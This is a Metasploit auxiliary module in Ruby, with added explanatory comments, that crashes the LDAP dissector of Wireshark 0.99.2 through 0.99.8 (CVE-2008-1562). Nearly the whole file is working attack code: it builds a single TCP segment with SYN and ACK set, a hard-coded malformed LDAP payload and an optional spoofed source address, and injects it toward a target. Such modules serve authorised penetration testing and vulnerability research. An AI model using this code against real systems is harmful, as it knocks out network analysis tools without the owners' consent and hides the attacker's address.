GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/wireshark/ldap.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
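# Auxiliary module tied to CVE-2008-1562 / OSVDB 43840. Per its own
# description, the LDAP dissector in Wireshark 0.99.2 through 0.99.8 can be
# crashed by a malformed packet; the affected component is the analysis tool
# that decodes the traffic, not an LDAP server.
#
# Defender notes grounded in this file:
# * Only Wireshark 0.99.2 through 0.99.8 are listed as affected, so hosts
#   running a release outside that range are not covered by this description.
# * The SHOST option lets the source address be set arbitrarily, so the source
#   IP recorded for such a packet is not reliable for attribution.
# * The segment is sent on its own with both SYN and ACK set and a payload
#   attached; no handshake is performed in this module.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Capture
  include Msf::Auxiliary::Dos

  # Declares the module metadata (name, description, references, stability
  # notes) and the user-facing options.
  def initialize
    super(
      'Name' => 'Wireshark LDAP Dissector DOS',
      'Description' => %q{
        The LDAP dissector in Wireshark 0.99.2 through 0.99.8 allows remote attackers
        to cause a denial of service (application crash) via a malformed packet.
      },
      'Author' => ['MC'],
      'License' => MSF_LICENSE,
      'References' => [
        [ 'CVE', '2008-1562' ],
        [ 'OSVDB', '43840' ],
      ],
      'DisclosureDate' => 'Mar 28 2008',
      'Notes' => {
        'Stability' => [CRASH_SERVICE_DOWN],
        'SideEffects' => [],
        'Reliability' => []
      }
    )

    register_options([
      # Destination TCP port; defaults to 389.
      OptInt.new('RPORT', [true, 'The destination port', 389]),
      # Optional source address override; when unset, run falls back to
      # Rex::Socket.source_address(rhost).
      OptAddress.new('SHOST', [false, 'This option can be used to specify a spoofed source address', nil])
    ])

    # This module only injects a packet, so the capture filter and pcap-file
    # options are removed from the option list.
    deregister_options('FILTER', 'PCAPFILE')
  end

  # Builds one TCP segment carrying the malformed LDAP payload and injects it
  # towards rhost through the capture handle.
  #
  # The capture handle is opened first and is always released in the ensure
  # clause, so an exception raised while building or sending the packet no
  # longer leaves the handle open.
  def run
    open_pcap

    begin
      print_status("Sending malformed LDAP packet to #{rhost}")

      # Random three-letter lowercase label, used for both dc= components.
      label = Rex::Text.rand_text_alpha_lower(3)

      pkt = PacketFu::TCPPacket.new
      pkt.ip_saddr = datastore['SHOST'] || Rex::Socket.source_address(rhost)
      pkt.ip_daddr = rhost
      # Random 32-bit acknowledgement number; SYN and ACK are both set.
      pkt.tcp_ack = rand(0x100000000)
      pkt.tcp_flags.syn = 1
      pkt.tcp_flags.ack = 1
      pkt.tcp_dport = datastore['RPORT'].to_i
      pkt.tcp_win = 3072
      # Fixed byte string from the module; only the dc= labels vary per run.
      pkt.payload = "0O\002\002;\242cI\004\rdc=#{label},dc=#{label}\n\001\002\n\001\000\002\001\000\002\001\000\001\001\000\241'\243\016"
      # Called after every field is set; presumably refreshes the derived
      # header fields (lengths/checksums) -- confirm in PacketFu.
      pkt.recalc

      # NOTE(review): the return value of capture_sendto is discarded, so a
      # failed send would not be reported here -- confirm against the Capture
      # mixin whether it signals failure through its return value.
      capture_sendto(pkt, rhost)
    ensure
      close_pcap
    end
  end
end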